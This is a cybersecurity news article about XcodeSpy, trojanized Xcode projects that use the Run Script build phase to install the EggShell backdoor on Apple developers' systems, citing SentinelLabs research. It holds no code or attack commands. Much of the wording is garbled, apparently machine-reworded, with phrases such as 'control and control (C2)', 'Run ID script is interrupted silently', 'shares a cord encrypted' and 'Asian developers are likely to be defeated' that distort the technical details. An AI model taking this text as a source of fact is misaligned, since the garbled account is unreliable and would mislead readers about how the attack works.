Thursday, September 23, 2021

Apple developers targeted by EggShell Backdoor

Must Read

A Fifth of Consumers Affected by Identity Fraud in 2020

One in five individuals is influenced by identity fraud this year, having been advised that their private information was...

Chinese national, Three others arrested for Instant loan apps fraud in Cyberabad

Cyber Crime Police, Cyberabad raided a telephone center called"Cubevo Technology Private Limited" (Skyline) situated in town led by a...

Vulnerabilities in Atlassian domains Could takeover Any Atlassian Account

Vulnerabilities that could allow XSS, CSRF and one-click account takeovers in Atlassian subdomains have been patched.Atlassian, a platform used...

Xcode malicious projects are used to hijack developer systems and distribute EggShell custom backdoors.

The malware, called XcodeSpy, is targeted by Xcode, an integrated development platform (IDE) used in macOS for Apple’s software development.

According to a study published by Sentinel Labs on Thursday, the Run Script feature in IDE is used in attacks targeted at iOS developers in the form of Trojanized Xcode projects freely distributed online.

Official, open Xcode projects can be found on GitHub. However, in this case, XcodeSpy projects provide “advanced features” to slash the iOS tab bars – and once the original build has been downloaded and set up, the malicious text is processed to install the EggShell backdoor.

A malicious project investigated by investigators is a ripped version of TabBarInteraction, an official project that has not been compromised. 

Run ID script is interrupted silently to connect the control and control (C2) server to the developer project.

Apple’s IDE functionality that allows Shell’s custom text to send when the app model is launched is a matter of abuse.

C2 then interacts with the script to download and download unique customizations outside EggShell, which includes user LaunchAgent persistence.

Two versions of EggShell have been discovered – one of which shares a cord encrypted with XcodeSpy.

The backdoor can hijack the victim’s developer microphone, camera, and keyboard, and capture and send files to the attacker’s C2.

SentinelLabs says at least one US organization has been caught in such an attack and Asian developers are likely to be defeated in the campaign, which operated at least between July and October last year.

Back-up samples were uploaded to VirusTotal on August 5 and October 13. XcodeSpy began uploading on September 4, however, researchers suspect the attacker may have downloaded the sample himself to test the detection rates.

“While XcodeSpy seems to be targeted at developers themselves rather than products or developers’ clients, it is a short step away from redirecting the developer’s workplace to deliver malware to users of that developer’s software,” the researchers said. “As a result, all Apple developers are cautioned to check for any serious Run scripts whenever Xcode projects from third parties are approved.”

Back in August, Trend Micro tracked XCSSET malware on Xcode projects, which are thought to have spread to compromise Safari browser sessions on sensitive identity theft, cross-site scripting (XSS), and theft of developer data.

The team said the discovery eventually led to “a rabbit hole for malicious payloads.”

a2434345d63481a40f0d145881b41013?s=96&d=mm&r=g
Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc' Priyanshu Vijayvargiya is a cybersecurity analyst, Information Security professional, developer, and a white hat hacker.

Leave a reply

Please enter your comment!
Please enter your name here

Latest News

Attackers Using Morse Code in phishing campaign to Evade Detection

Microsoft on Thursday revealed the techniques used by attackers to avoid detection using morse code in the phishing campaign.Microsoft...

Murata Manufacturing suffers data breach of employees and customer

Japanese electronic components manufacturer Murata has released an apology Notice for the data breach of thousands of files in June that contained bank account...

Everything about Signalling System 7(SS7)

Signaling System 7 (SS7) is an international telecommunication protocol standard that controls and regulates the network elements in a public switched telephone network (PSTN)....

Zimbra flaw lets attackers access the mail servers

Researchers discovered a flaw in the open-source Zimbra code. As a result, an attacker would gain unrestricted access to all sent and received emails...

Apple Releases patches for an actively exploited zero-day flaw in ios, macOS

Apple on Monday Release an urgent security patch for iOS,macOS, iPadOS, to address a zero-day flaw that has been actively exploited.Apple has revealed that...

More Articles Like This